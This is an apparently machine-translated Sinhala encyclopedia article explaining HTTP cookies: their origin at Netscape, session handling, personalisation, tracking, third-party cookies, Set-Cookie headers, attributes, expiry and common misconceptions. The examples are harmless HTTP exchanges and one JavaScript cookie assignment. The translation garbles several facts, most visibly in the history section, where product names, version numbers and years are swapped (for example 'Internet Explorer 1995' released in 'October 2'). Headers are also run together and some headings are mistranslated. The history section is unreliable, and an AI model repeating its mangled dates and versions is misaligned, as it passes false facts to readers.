අන්තර්ජාල කුකී: එය කුමක්ද? අර්ථ දැක්වීම, සම්භවය, වර්ග සහ පෞද්ගලිකත්වය

Un කුකිය හෝ වෙබ් කුකිය (හෝ කුකීස්ලෙස කෙටියෙන් දක්වා ඇත සාක්ෂි ක්විබෙක්හි) යනු HTTP සන්නිවේදන ප්‍රොටෝකෝලය විසින් HTTP සේවාදායකයක් විසින් HTTP සේවාදායකයෙකු වෙත යවන ලද තොරතුරු අනුපිළිවෙලක් ලෙස අර්ථ දක්වා ඇත, එය යම් යම් කොන්දේසි යටතේ එකම HTTP සේවාදායකයෙන් විමසන සෑම අවස්ථාවකම එය ආපසු ලබා දෙයි.

කුකී යනු a ට සමාන වේ ටර්මිනලයේ ගබඩා කර ඇති කුඩා පෙළ ගොනුව අන්තර්ජාල පරිශීලකයාගේ. වසර 20කට වැඩි කාලයක් පවතින අතර, ඔවුන් වෙබ් අඩවි සංවර්ධකයින්ට ඔවුන්ගේ සංචලනය පහසු කිරීමට සහ ඇතැම් ක්‍රියාකාරීත්වයන්ට ඉඩ දීම සඳහා පරිශීලක දත්ත ගබඩා කිරීමට ඉඩ සලසයි. තුන්වන පාර්ශ්වයන් විසින් සූරාකෑමට ලක්විය හැකි අවශේෂ පුද්ගලික තොරතුරු අඩංගු බැවින් කුකීස් සැමවිටම අඩු වැඩි වශයෙන් මතභේදයට තුඩුදී ඇත.

එය HTTP ශීර්ෂයක් ලෙස වෙබ් සේවාදායකය විසින් වෙබ් බ්‍රවුසරයට යවනු ලබන අතර එය සේවාදායකයට ප්‍රවේශ වන සෑම අවස්ථාවකම එය නොවෙනස්ව ලබා දෙයි. කුකියක් භාවිතා කළ හැකිය සත්‍යාපනයකි, සැසියක් (රාජ්ය නඩත්තු), සහ සඳහා පරිශීලකයා පිළිබඳ නිශ්චිත තොරතුරු ගබඩා කරන්න, අඩවි මනාප හෝ ඉලෙක්ට්‍රොනික සාප්පු කරත්තයක අන්තර්ගතය වැනි. කුකී යන පදය ව්‍යුත්පන්න වී ඇත මැජික් කුකිය, UNIX පරිගණනයේ සුප්‍රසිද්ධ සංකල්පයක් වන අතර එය බ්‍රවුසර කුකීස් පිළිබඳ අදහස සහ නම ආභාෂය ලබා දුන්නේය. කුකීස් සඳහා විකල්ප කිහිපයක් තිබේ, ඒ සෑම එකක්ම තමන්ගේම භාවිතයන්, වාසි සහ අවාසි ඇත.

සරල පෙළ ගොනු වීම නිසා කුකීස් ක්‍රියාත්මක කළ නොහැක. ඒගොල්ලො නෙමෙයි ඔත්තු මෘදුකාංග හෝ වෛරස් නොවේ, සමහර වෙබ් අඩවි වල කුකීස් බොහෝ ප්‍රති-වයිරස මෘදුකාංග මගින් අනාවරණය කරගනු ලැබුවද, පරිශීලකයන් බහුවිධ අඩවි වෙත පිවිසෙන විට ඒවා නිරීක්ෂණය කිරීමට ඉඩ සලසයි. 

බොහෝ නවීන බ්‍රව්සර් පරිශීලකයින්ට ඉඩ දෙයි කුකීස් පිළිගන්නවාද ප්‍රතික්ෂේප කරනවාද යන්න තීරණය කරන්න. පරිශීලකයින්ට ද හැකිය කුකීස් කොපමණ කාලයක් ගබඩා කර ඇත්දැයි තෝරන්න. කෙසේ වෙතත්, කුකීස් සම්පූර්ණයෙන්ම ප්රතික්ෂේප කිරීම සමහර වෙබ් අඩවි භාවිතයට නුසුදුසු වේ. උදාහරණයක් ලෙස, අක්තපත්‍ර (පරිශීලක නාමය සහ මුරපදය) භාවිතයෙන් පිවිසීමට අවශ්‍ය සාප්පු කරත්ත හෝ අඩවි ගබඩා කරන්න.

ඉතිහාසඥයා

මෙම පදය කුකී ඉංග්‍රීසි යෙදුමෙන් ව්‍යුත්පන්න වේ මැජික් කුකිය, එය වැඩසටහනකට ලැබෙන සහ නොවෙනස්ව ආපසු ලැබෙන දත්ත පැකට්ටුවකි. කුකීස් දැනටමත් තොරතුරු තාක්ෂණයේ භාවිතා කර ඇත Lou Montulli වෙබ් සන්නිවේදනයේදී ඒවා භාවිතා කිරීමට අදහසක් තිබුණා 1994 ජුනි මාසයේදී. ඒ වන විට ඔහු සේවාලාභියෙකු සඳහා ඊ-වාණිජ්‍ය යෙදුමක් නිපදවා ඇති Netscape Communications හි සේවය කළේය. කුකීස් වෙළඳසැලක අතථ්‍ය සාප්පු කරත්ත ක්‍රියාත්මක කිරීමේ විශ්වසනීයත්වය පිළිබඳ ගැටලුවට විසඳුමක් ලබා දුන්නේය.

John Giannandrea සහ Lou Montulli එම වසරේම Netscape හි පළමු කුකී පිරිවිතර ලිවීය. 0.9 ඔක්තෝබර් 13 දින නිකුත් කරන ලද Mosaic Netscape හි 1994 බීටා අනුවාදය ඒකාබද්ධ කරන ලදී කුකී තාක්ෂණය (post බලන්න) කුකීස් වල පළමු (පරීක්ෂණාත්මක නොවන) භාවිතය වූයේ Netscape වෙබ් අඩවියට පැමිණෙන අමුත්තන් මීට පෙර වෙබ් අඩවියට පැමිණ තිබේද යන්න තීරණය කිරීමයි. Montulli 1995 දී කුකී තාක්ෂණය සඳහා පේටන්ට් බලපත්‍රයක් ගොනු කළ අතර එක්සත් ජනපද පේටන්ට් බලපත්‍රය 5774670 ලබා දෙන ලදී. 1998 දී ලබා දෙන ලදී.

0.9 දී Netscape 1994 බීටා හි ක්‍රියාත්මක කිරීමෙන් පසුව, කුකීස් 2 ඔක්තෝම්බර් මාසයේදී නිකුත් කරන ලද Internet Explorer 1995 වෙත ඒකාබද්ධ කරන ලදී.

කුකීස් හඳුන්වාදීම තවමත් මහජනතාවට පුළුල් ලෙස දැනගෙන නොමැත. විශේෂයෙන්ම, බ්රවුසරයේ සිටුවම්වල පෙරනිමියෙන් කුකීස් පිළිගනු ලැබූ අතර, පරිශීලකයින්ට ඔවුන්ගේ පැමිණීම ගැන දැනුම් දුන්නේ නැත. 1995 මුල් කාර්තුවේදී කුකීස් පවතින බව ඇතැමුන් දැන සිටි නමුත් සාමාන්‍ය ජනතාව ඔවුන්ගේ පැවැත්මට යොමු වූයේ 12 පෙබරවාරි 1996 වැනි දින ෆිනෑන්ෂල් ටයිම්ස් පුවත්පතේ ලිපියක් පළ කිරීමෙන් පසුවය. එම වසරේම කුකීස් සඳහා විශාල මාධ්‍ය අවධානයක් ලැබිණි. විය හැකි පුද්ගලිකත්වයට ඇතුල් විය හැකි නිසා. කුකීස් විෂය 1996 සහ 1997 දී ඇමරිකානු ෆෙඩරල් වෙළඳ කොමිසමේ උපදේශන දෙකක දී සාකච්ඡා කරන ලදී.

නිල කුකී පිරිවිතර සංවර්ධනය දැනටමත් සිදු වෙමින් පවතී. නිල පිරිවිතරයන් පිළිබඳ පළමු සාකච්ඡා 1995 අප්‍රේල් මාසයේදී www-talk තැපැල් ලැයිස්තුවේ සිදු විය. විශේෂ IETF ක්‍රියාකාරී කණ්ඩායමක් පිහිටුවන ලදී. HTTP ගනුදෙනු සඳහා ප්‍රාන්තය හඳුන්වාදීම සඳහා විකල්ප යෝජනා දෙකක් පිළිවෙළින් Brian Behlendorf සහ David Kristol විසින් යෝජනා කරන ලද නමුත් Kristol විසින්ම ප්‍රමුඛ කණ්ඩායම Netscape හි පිරිවිතරයන් ආරම්භක ලක්ෂ්‍යයක් ලෙස භාවිතා කිරීමට තීරණය කළේය. 1996 පෙබරවාරියේදී, තුන්වන පාර්ශ්ව කුකීස් පෞද්ගලිකත්වයට සැලකිය යුතු තර්ජනයක් බව ක්‍රියාකාරී කණ්ඩායම තීරණය කළේය. සමූහය විසින් නිෂ්පාදනය කරන ලද පිරිවිතර අවසානයේ ප්‍රකාශයට පත් කරන ලදී RFC 2109.

2014 අග සිට, අපි බොහෝ වෙබ් අඩවි වල කුකීස් පිළිබඳ බැනරයක් දකිමු. ඉඩ දෙන අවම වශයෙන් එක් බ්‍රවුසර දිගුවක් තිබේ බැනරය නොපෙන්වයි.

කුකීස් වර්ග සහ භාවිතය

සැසි කළමනාකරණය

සංචාලනය අතරතුර පරිශීලක දත්ත පවත්වා ගැනීමට කුකීස් භාවිතා කළ හැක, නමුත් බහු සංචාරයන් හරහාද. කුකීස් හඳුන්වා දෙනු ලැබුවේ ඉලෙක්ට්‍රොනික සාප්පු කරත්ත ක්‍රියාත්මක කිරීමේ මාධ්‍යයක් සැපයීම සඳහා වන අතර, පරිශීලකයාට වෙබ් අඩවිය පිරික්සීමේදී තමාට මිලදී ගැනීමට අවශ්‍ය අයිතම රැස් කර ගත හැකි අතථ්‍ය උපාංගයකි.

මේ දිනවල, සාප්පු කරත්ත වැනි යෙදුම් ඒ වෙනුවට සේවාදායකයක දත්ත ගබඩාවක අයිතම ලැයිස්තුව ගබඩා කරයි, එය වඩාත් සුදුසු ය; කුකියේම ඒවා සුරැකීමට වඩා. වෙබ් සේවාදායකය අද්විතීය සැසි හැඳුනුම්පතක් අඩංගු කුකියක් යවයි. වෙබ් බ්‍රවුසරය පසුව එක් එක් ඊළඟ ඉල්ලීම මත මෙම සැසි හැඳුනුම්පත ආපසු ලබා දෙන අතර කූඩයේ ඇති අයිතම සුරකින අතර මෙම අද්විතීය සැසි හැඳුනුම්පත සමඟ සම්බන්ධ වේ.

කුකීස් නිතර භාවිතා කිරීම අක්තපත්‍ර භාවිතයෙන් වෙබ් අඩවියකට ලොග් වීම සඳහා ප්‍රයෝජනවත් වේ. කෙටියෙන් කිවහොත්, වෙබ් සේවාදායකය මුලින්ම අද්විතීය සැසි හැඳුනුම්පතක් අඩංගු කුකියක් යවයි. එවිට පරිශීලකයින් ඔවුන්ගේ අක්තපත්‍ර ලබා දෙයි (සාමාන්‍යයෙන් පරිශීලක නාමයක් සහ මුරපදයක්). වෙබ් යෙදුම පසුව සැසිය සත්‍යාපනය කර පරිශීලකයාට සේවාව වෙත ප්‍රවේශ වීමට ඉඩ සලසයි.

පුද්ගලාරෝපණය

අනාගතයේදී ඔහුට සුදුසු අන්තර්ගතය පෙන්වීම සඳහා, වෙබ් අඩවියක පරිශීලකයා පිළිබඳ තොරතුරු මතක තබා ගැනීමට කුකීස් භාවිතා කළ හැක. උදාහරණයක් ලෙස, වෙබ් සේවාදායකයකට එම වෙබ් අඩවියට ලොග් වීමට භාවිතා කළ අවසන් පරිශීලක නාමය අඩංගු කුකියක් යැවිය හැක, එවිට පරිශීලක නාමය අනාගත පැමිණීම් වලදී පූර්ව-ජනගත කළ හැක.

බොහෝ වෙබ් අඩවි පරිශීලක මනාපයන් මත පදනම්ව පුද්ගලීකරණය සඳහා කුකීස් භාවිතා කරයි. පරිශීලකයන් ඔවුන්ගේ මනාපයන් පෝරමයකින් තෝරා සේවාදායකයට ඉදිරිපත් කරන්න. සේවාදායකය කුකියක මනාපයන් සංකේතනය කර එය බ්‍රවුසරයට යවයි. පසුව, පරිශීලකයා මෙම වෙබ් අඩවියේ පිටුවකට පිවිසෙන සෑම අවස්ථාවකම, බ්‍රවුසරය කුකිය ආපසු ලබා දෙන අතර එබැවින් මනාප ලැයිස්තුව; සේවාදායකයාගේ අභිමතය පරිදි පිටුව අභිරුචිකරණය කළ හැක. උදාහරණයක් ලෙස, විකිපීඩියා වෙබ් අඩවිය එහි පරිශීලකයින්ට ඔවුන් කැමති වෙබ් අඩවියේ සම තෝරා ගැනීමට ඉඩ සලසයි. Google සෙවුම් යන්ත්‍රය එහි පරිශීලකයින්ට (ඔවුන් ලියාපදිංචි වී නොමැති වුවද) එක් එක් ප්‍රතිඵල පිටුවෙහි ඔවුන්ට දැකීමට අවශ්‍ය ප්‍රතිඵල ගණන තෝරා ගැනීමට ඉඩ සලසයි.

ලුහුබැඳීම

අන්තර්ජාලය භාවිතා කරන්නන්ගේ බ්‍රවුස් කිරීමේ පුරුදු නිරීක්ෂණය කිරීමට ට්‍රැකින් කුකීස් භාවිතා කරයි. මෙය පරිගණකයේ IP ලිපිනය භාවිතයෙන් පිටුවක් සඳහා ඉල්ලීමක් කිරීමෙන් හෝ සේවාදායකයා සෑම ඉල්ලීමක් සමඟම යවන 'යොමු කරන්නා' HTTP ශීර්ෂය භාවිතා කිරීමෙන්ද සිදු කළ හැක, නමුත් කුකීස් වැඩි නිරවද්‍යතාවයකට ඉඩ සලසයි. පහත උදාහරණයේ ඇති පරිදි මෙය කළ හැකිය:

1. පරිශීලකයා වෙබ් අඩවියක පිටුවක් ඇමතුවහොත් සහ ඉල්ලීමෙහි කුකියක් අඩංගු නොවේ නම්, සේවාදායකයා උපකල්පනය කරන්නේ මෙය පරිශීලකයා විසින් නැරඹූ පළමු පිටුව බවයි. එවිට සේවාදායකය අහඹු තන්තුවක් සාදා එය ඉල්ලූ පිටුව සමඟ බ්‍රවුසරයට යවයි.
2. මෙම මොහොතේ සිට, වෙබ් අඩවියේ නව පිටුවක් කැඳවන සෑම අවස්ථාවකම කුකිය බ්‍රවුසරය මඟින් ස්වයංක්‍රීයව යවනු ලැබේ. සේවාදායකය සාමාන්‍ය පරිදි පිටුව යවනු ඇත, නමුත් ලොග් ගොනුවක නම් කරන ලද පිටුවේ URL, ඉල්ලීමේ දිනය, වේලාව සහ කුකිය ද ලොග් කරනු ඇත.

ලොග් ගොනුව දෙස බැලීමෙන්, පරිශීලකයා පැමිණ ඇත්තේ කුමන පිටු සහ කුමන අනුපිළිවෙලටද යන්න දැක ගත හැකිය. උදාහරණයක් ලෙස, ගොනුවේ id=abc කුකිය භාවිතයෙන් කරන ලද ඉල්ලීම් කිහිපයක් තිබේ නම්, මෙම සියලු ඉල්ලීම් එකම පරිශීලකයෙකුගෙන් ලැබෙන බව මෙයින් තහවුරු විය හැක. ඉල්ලූ URL එක, ඉල්ලීම් හා සම්බන්ධ දිනය සහ වේලාව පරිශීලකයාගේ බ්‍රවුස් කිරීම නිරීක්ෂණය කිරීමට ඉඩ දෙයි.

තුන්වන පාර්ශ්ව කුකීස් සහ වෙබ් බීකන්ස්, පහත විස්තර කර ඇත, ඊට අමතරව විවිධ අඩවි හරහා ලුහුබැඳීම සබල කරන්න. තනි අඩවි ලුහුබැඳීම සාමාන්‍යයෙන් සංඛ්‍යානමය අරමුණු සඳහා භාවිතා වේ. ඊට ප්‍රතිවිරුද්ධව, තුන්වන පාර්ශ්ව කුකීස් භාවිතයෙන් විවිධ අඩවි හරහා ලුහුබැඳීම සාමාන්‍යයෙන් වෙළඳ දැන්වීම් සමාගම් විසින් නිර්නාමික පරිශීලක පැතිකඩ නිෂ්පාදනය කිරීමට භාවිතා කරයි (පසුව ඒවා පරිශීලකයාට පෙන්විය යුතු වෙළඳ දැන්වීම් තීරණය කිරීමට මෙන්ම මෙම වෙළඳ දැන්වීම් වලට අනුරූප ඊමේල් යැවීමටද භාවිතා කරයි - SPAM. )

ලුහුබැඳීමේ කුකීස් පරිශීලක පෞද්ගලිකත්වය ආක්‍රමණය කිරීමේ අවදානමක් වන නමුත් ඒවා පහසුවෙන් මකා දැමිය හැක. බොහෝ නවීන බ්‍රව්සර්වල යෙදුම වසා දැමීමේදී නොනැසී පවතින කුකීස් ස්වයංක්‍රීයව මකා දැමීමේ විකල්පයක් ඇතුළත් වේ.

තෙවන පාර්ශවීය කුකීස්

වෙබ් පිටුවක අඩංගු පින්තූර සහ අනෙකුත් වස්තු එම පිටුවට සත්කාරකත්වය සපයන සේවාදායකයට වඩා වෙනස් සේවාදායකයන් මත රැඳී සිටිය හැක. පිටුව පෙන්වීමට, බ්රවුසරය මෙම සියලු වස්තූන් බාගත කරයි. බොහෝ වෙබ් අඩවි විවිධ මූලාශ්රවලින් තොරතුරු අඩංගු වේ. උදාහරණයක් ලෙස, ඔබ ඔබේ බ්‍රවුසරයට www.example.com ටයිප් කරන්නේ නම්, බොහෝ විට විවිධ මූලාශ්‍රවලින්, එනම් www. .example.com ට වඩා වෙනස් වසමකින් එන පිටුවේ කොටසක වස්තු හෝ වෙළඳ දැන්වීම් ඇත. "පළමු" කුකීස් යනු බ්‍රවුසරයේ ලිපින තීරුවේ ලැයිස්තුගත කර ඇති වසම මගින් සකසා ඇති කුකීස් ය. තෙවන පාර්ශ්ව කුකීස් වෙනත් වසමකින් එන පිටු වස්තු වලින් එකකින් සකසා ඇත.

පෙරනිමියෙන්, මොසිල්ලා ෆයර්ෆොක්ස්, මයික්‍රොසොෆ්ට් ඉන්ටර්නෙට් එක්ස්ප්ලෝරර් සහ ඔපෙරා වැනි බ්‍රව්සර් තෙවන පාර්ශවීය කුකීස් පිළිගන්නා නමුත් පරිශීලකයින්ට ඒවා අවහිර කිරීමට බ්‍රව්සර් විකල්පවල සැකසුම් වෙනස් කළ හැකිය. වෙබ් ක්‍රියාකාරීත්වය සක්‍රීය කරන තුන්වන පාර්ශ්ව කුකීස් තුළ ආවේනික ආරක්ෂක අවදානමක් නැත, කෙසේ වෙතත් ඒවා පරිශීලකයන් හඹා යාමට ද භාවිතා වේ. අඩවියෙන් අඩවියට.

ගූගල් ක්‍රෝම් ඇතුළු සියලුම බ්‍රව්සර් සඳහා ලබා ගත හැකි Ghostery වැනි මෙවලම් තෙවන පාර්ශවයන් අතර හුවමාරු අවහිර කළ හැක.

ක්රියාත්මක කිරීම

කුකීස් යනු වෙබ් සේවාදායකය විසින් බ්‍රවුසරයට යවන කුඩා දත්ත කොටස් වේ. බ්‍රවුසරය ඒවා නොවෙනස්ව සේවාදායකය වෙත ආපසු ලබා දෙයි, වෙනත් ආකාරයකින් අස්ථායී HTTP ගනුදෙනුවට තත්වය (අතීත සිදුවීම්වල මතකය) හඳුන්වා දෙයි. කුකීස් නොමැතිව, එක් එක් වෙබ් පිටුවක් හෝ වෙබ් පිටුවක සංරචකයක් නැවත ලබා ගැනීම එකම අඩවියට කරන ලද වෙනත් ඉල්ලීම් වලින් ස්වාධීනව හුදකලා සිදුවීමකි. වෙබ් සේවාදායකය විසින් සැකසීමට අමතරව, බ්‍රවුසරය මඟින් සහය දක්වන්නේ නම් සහ අවසර දී ඇත්නම්, JavaScript වැනි භාෂා ස්ක්‍රිප්ට් කිරීම මගින්ද කුකීස් සැකසිය හැක.

නිල කුකී පිරිවිතරයන් යෝජනා කරන්නේ බ්‍රවුසරවලට අවම කුකීස් සංඛ්‍යාවක් සුරැකීමට සහ නැවත යැවීමට හැකි විය යුතු බවයි. විශේෂයෙන්ම, බ්‍රවුසරයකට අවම වශයෙන් කිලෝබයිට් හතරක කුකීස් 300ක්වත්, එක් සේවාදායකයක් හෝ වසමක් සඳහා අවම වශයෙන් කුකීස් 20ක්වත් ගබඩා කිරීමට හැකි විය යුතුය.

3.1 වගන්තියට අනුව RFC 2965, කුකී නම් සිද්ධි සංවේදී නොවේ.

කුකියකට එහි කල් ඉකුත්වන දිනය නියම කළ හැක, මෙම දිනයේ දී කුකිය මකා දැමෙනු ඇත. කුකිය කල් ඉකුත්වන දිනයක් සඳහන් නොකරන්නේ නම්, පරිශීලකයා ඔහුගේ බ්‍රවුසරයෙන් ඉවත් වූ වහාම කුකිය මකා දමනු ලැබේ. එබැවින්, කල් ඉකුත්වන දිනයක් නියම කිරීම කුකිය සැසි කිහිපයකින් නොනැසී පවතිනු ඇති ආකාරයකි. මේ හේතුව නිසා, කල් ඉකුත්වන දිනයක් සහිත කුකීස් යැයි කියනු ලැබේ දිගටම පවතින. උදාහරණ යෙදුමක්: සිල්ලර වෙබ් අඩවියක් පරිශීලකයන් තම සාප්පු කරත්තයේ තබා ඇති අයිතම වාර්තා කිරීමට ස්ථීර කුකීස් භාවිතා කළ හැකිය (සැබෑවේදී, කුකිය ඔබේ පරිගණකයේ නොව විකුණුම් අඩවියේ දත්ත ගබඩාවක සුරකින ලද ප්‍රවේශයක් වෙත යොමු විය හැක) . මෙම ක්‍රමය හරහා, පරිශීලකයින් තම බ්‍රව්සරය මිලදී ගැනීමකින් තොරව ඉවත් කර පසුව එය වෙත ආපසු ගියහොත්, ඔවුන්ට නැවත කරත්තයේ ඇති අයිතම සොයා ගැනීමට හැකි වනු ඇත. මෙම කුකීස් කල් ඉකුත් වීමේ දිනයක් ලබා නොදුන්නේ නම්, බ්රවුසරය වසා දැමූ විට ඒවා කල් ඉකුත් වනු ඇත, සහ කූඩයේ අන්තර්ගතය පිළිබඳ තොරතුරු අහිමි වනු ඇත.

කුකීස් විශේෂිත වසමකට, උප ඩොමේනයකට හෝ ඒවා නිර්මාණය කළ සේවාදායකයේ ඇති මාර්ගයකට සීමා කළ හැක.

කුකියක් නිර්මාණය කිරීම

වෙබ් පිටු මාරු කිරීම HyperText Transfer Protocol (HTTP) භාවිතයෙන් සිදු කෙරේ. කුකීස් නොසලකා හැරීමෙන්, බ්‍රවුසරයන් වෙබ් සර්වර් වලින් පිටුවක් ඇමතීමට සාමාන්‍යයෙන් කෙටි පෙළක් එවීමෙන් HTTP ඉල්ලීම. උදාහරණයක් ලෙස, www.example.org/index.html පිටුවට පිවිසීමට, බ්‍රව්සර් www.example.org සේවාදායකයට සම්බන්ධ වී මේ වගේ ඉල්ලීමක් යවන්න:

	GET /index.html HTTP/1.1Host: www.example.org
උපදේශක	→	සේවාදායකය

සේවාදායකයා ප්‍රතිචාර දක්වන්නේ ඉල්ලන ලද පිටුව යැවීමෙන්, ඊට පෙර සමාන පෙළකින්, මුළු කැඳවීමෙනි HTTP ප්‍රතිචාරය. මෙම පැකට්ටුවේ කුකීස් ගබඩා කිරීමට බ්‍රවුසරයට උපදෙස් දෙන රේඛා අඩංගු විය හැක:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML පිටුව)
උපදේශක	←	සේවාදායකය

සේවාදායකයට කුකියක් ගබඩා කිරීමට බ්‍රවුසරයට අවශ්‍ය නම්, සේවාදායකය විසින් Set-Cookie රේඛාව පමණක් යවයි. Set-Cookie යනු බ්‍රවුසරයේ name=value string එක ගබඩා කර අනාගත සියලුම ඉල්ලීම් වලදී සේවාදායකය වෙත ආපසු ලබා දෙන ලෙස කරන ඉල්ලීමකි. බ්‍රවුසරය කුකීස් සඳහා සහය දක්වන්නේ නම් සහ බ්‍රවුසර විකල්පයන් තුළ කුකීස් සක්‍රීය කර ඇත්නම්, එම සේවාදායකයට කරන ලද සියලුම පසුකාලීන ඉල්ලීම් සඳහා කුකිය ඇතුළත් වේ. උදාහරණයක් ලෙස, www.example.org සේවාදායකයට පහත ඉල්ලීම යැවීමෙන් බ්‍රවුසරය www.example.org/news.html පිටුව අමතයි:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
උපදේශක	→	සේවාදායකය

මෙය එකම සේවාදායකයෙන් වෙනත් පිටුවක් සඳහා වන ඉල්ලීමක් වන අතර, සේවාදායකය විසින් කලින් බ්‍රවුසරයට යවන ලද තන්තුවක් එහි අඩංගු නිසා ඉහත පළමු පිටුවට වඩා වෙනස් වේ. මෙයට ස්තූතියි, මෙම ඉල්ලීම පෙර එකට සම්බන්ධ වී ඇති බව සේවාදායකයා දනී. සේවාදායකය ප්‍රතිචාර දක්වන්නේ නම් කරන ලද පිටුව යැවීමෙන් සහ එයට වෙනත් කුකීස් එකතු කිරීමෙනි.

නව පේළියක් Set-Cookie: name=new_value ලෙස හඳුන්වන පිටුවට ප්‍රතිචාර වශයෙන් යැවීමෙන් සේවාදායකයට කුකියේ අගය වෙනස් කළ හැක. බ්රවුසරය පසුව පැරණි අගය නව එකක් සමඟ ප්රතිස්ථාපනය කරයි.

Set-Cookie රේඛාව සාමාන්‍යයෙන් නිර්මාණය කරන්නේ CGI වැඩසටහනක් හෝ වෙනත් ස්ක්‍රිප්ටින් භාෂාවක් මගිනි, HTTP සේවාදායකයෙන් නොවේ. HTTP සේවාදායකය (උදාහරණ: Apache) වැඩසටහනේ ප්‍රතිඵලය (කුකීස් අඩංගු ශීර්ෂයට පෙර ඇති ලේඛනයක්) පමණක් බ්‍රවුසරයට සම්ප්‍රේෂණය කරයි.

බ්‍රවුසරයේ ක්‍රියාත්මක වන ජාවාස්ක්‍රිප්ට් හෝ වෙනත් සමාන භාෂාවලින් කුකීස් සැකසිය හැක, එනම් සේවාදායක පැත්තට වඩා සේවාදායක පැත්තේ. JavaScript හි, document.cookie වස්තුව මේ සඳහා භාවිතා වේ. උදාහරණයක් ලෙස, document.cookie = "උෂ්ණත්වය = 20" යන ප්‍රකාශය "උෂ්ණත්වය" නම් සහ 20 අගයක් සහිත කුකියක් නිර්මාණය කරයි.

කුකියක ගුණාංග

නම/අගය යුගලයට අමතරව, කුකියක කල් ඉකුත්වන දිනයක්, මාර්ගයක්, වසම් නාමයක් සහ අදහස් කරන සම්බන්ධතා වර්ගය, එනම් සාමාන්‍ය හෝ සංකේතනයද අඩංගු විය හැක. කුකීස් වලට අනිවාර්ය අනුවාද අංකයක් තිබිය යුතු බව RFC 2965 නිර්වචනය කරයි, නමුත් මෙය සාමාන්‍යයෙන් මග හැර ඇත. මෙම දත්ත කොටස් name=new_value යුගලය අනුගමනය කරන අතර ඒවා අර්ධ තීරු වලින් වෙන් කරනු ලැබේ. උදාහරණයක් ලෙස, Set-Cookie රේඛාවක් යැවීමෙන් සේවාදායකය විසින් කුකියක් සෑදිය හැක: name=new_value; expires=දිනය; මාර්ගය=/; domain=.example.org.

කුකියක කල් ඉකුත්වීම

පහත සඳහන් අවස්ථා වලදී කුකීස් කල් ඉකුත් වන අතර පසුව බ්‍රවුසරය මඟින් සේවාදායකය වෙත නොයවනු ලැබේ:

• බ්‍රවුසරය වසා ඇති විට, කුකිය නොනැසී පවතී නම්.
• කුකීස් කල් ඉකුත් වීමේ දිනය අවසන් වූ විට.
• කුකී කල් ඉකුත්වන දිනය (සේවාදායකය හෝ ස්ක්‍රිප්ට් මගින්) අතීතයේ දිනයකට වෙනස් කළ විට.
• පරිශීලකයාගේ ඉල්ලීම පරිදි බ්රවුසරය කුකිය මකා දැමූ විට.

තුන්වන තත්ත්වය සේවාදායකයන්ට හෝ ස්ක්‍රිප්ටවලට කුකියක් පැහැදිලිව මකා දැමීමට ඉඩ සලසයි. Google Chrome වෙබ් බ්‍රවුසරය සමඟ අන්තර්ගත සැකසුම් වෙත ප්‍රවේශ වීමෙන් යම් කුකියක කල් ඉකුත්වන දිනය දැන ගැනීමට හැකි බව සලකන්න. පරිගණකයක සුරකින ලද කුකියක් මැකීමට කිසිදු ක්‍රියා පටිපාටියක් නොගතහොත් දශක කිහිපයක් එහි පැවතිය හැකිය.

ඒකාකෘති

ඔවුන් අන්තර්ජාලයට හඳුන්වා දීමෙන් පසු, කුකීස් පිළිබඳ බොහෝ අදහස් අන්තර්ජාලයේ සහ මාධ්‍යවල සංසරණය වී ඇත. 1998 දී, එක්සත් ජනපදයේ බලශක්ති දෙපාර්තමේන්තුවේ පරිගණක සිදුවීම් නිරීක්ෂණ කණ්ඩායමක් වන CIAC, කුකී ආරක්ෂණ දුර්වලතා "අත්‍යවශ්‍යයෙන්ම නොපවතින" බව තීරණය කළ අතර, "ඔබගේ පැමිණීම්වල මූලාරම්භය සහ ඔබ පිවිසි වෙබ් පිටු පිළිබඳ තොරතුරු" පැහැදිලි කළේය. වෙබ් සර්වර් වල ලොග් ගොනු වල දැනටමත් පවතී". 2005 දී, Jupiter Research විසින් අධ්‍යයනයක ප්‍රතිඵල ප්‍රකාශයට පත් කරන ලද අතර, ප්‍රතිචාර දැක්වූවන්ගෙන් සැලකිය යුතු ප්‍රතිශතයක් පහත ප්‍රකාශයන් සලකා බැලූහ:

• කුකීස් වගේ වෛරසය, ඒවා භාවිතා කරන්නන්ගේ දෘඪ තැටි ආසාදනය කරයි.
• කුකීස් ජනනය කරයි මතුවන.
• යැවීමට කුකීස් භාවිතා කරයි ස්පෑම්.
• කුකීස් භාවිතා කරන්නේ වෙළඳ දැන්වීම් සඳහා පමණි.

කුකීස් වලට පරිශීලකයාගේ පරිගණකයෙන් තොරතුරු මැකීමට හෝ කියවීමට නොහැක. කෙසේ වෙතත්, කුකීස් විසින් ලබා දී ඇති වෙබ් අඩවියක හෝ අඩවි කට්ටලයක පරිශීලකයෙකු විසින් පිවිසෙන වෙබ් පිටු හඳුනා ගැනීමට හැකි වේ. මෙම තොරතුරු භාවිතා කළ හැකි හෝ තෙවන පාර්ශ්ව වෙත නැවත විකිණීමට හැකි පරිශීලක පැතිකඩක් තුළ එකතු කළ හැකි අතර, එය බරපතල රහස්‍යතා ගැටලු ඇති කළ හැක. සමහර පැතිකඩ නිර්නාමික ය, එනම් ඒවායේ පුද්ගලික තොරතුරු අඩංගු නොවන නමුත් එවැනි පැතිකඩ පවා සැක සහිත විය හැකිය.

එම අධ්‍යයනයට අනුව, අන්තර්ජාල භාවිතා කරන්නන්ගෙන් විශාල ප්‍රතිශතයක් කුකීස් මකා දැමිය යුතු ආකාරය නොදනී. මිනිසුන් කුකීස් විශ්වාස නොකිරීමට එක් හේතුවක් නම්, සමහර වෙබ් අඩවි කුකීස්වල පුද්ගලිකව හඳුනාගැනීමේ අංගය අපයෝජනය කර ඇති අතර මෙම තොරතුරු වෙනත් මූලාශ්‍ර සමඟ බෙදාගෙන ඇත. අයාචිත තැපෑල ලෙස සැලකෙන ඉලක්කගත වෙළඳ ප්‍රචාරණ සහ අනවශ්‍ය විද්‍යුත් තැපෑලෙන් විශාල ප්‍රතිශතයක් පැමිණෙන්නේ කුකීස් ලුහුබැඳීමෙන් ලබාගත් තොරතුරු මගිනි.

බ්රවුසර සැකසුම්

බොහෝ බ්‍රව්සර් කුකීස් සඳහා සහය දක්වන අතර පරිශීලකයාට ඒවා අක්‍රිය කිරීමට ඉඩ දෙයි. වඩාත් පොදු විකල්ප වන්නේ:

• කුකීස් සම්පූර්ණයෙන්ම සක්‍රිය හෝ අක්‍රිය කරන්න, එවිට ඒවා නිරන්තරයෙන් පිළිගනු ලැබේ හෝ අවහිර කරනු ලැබේ.
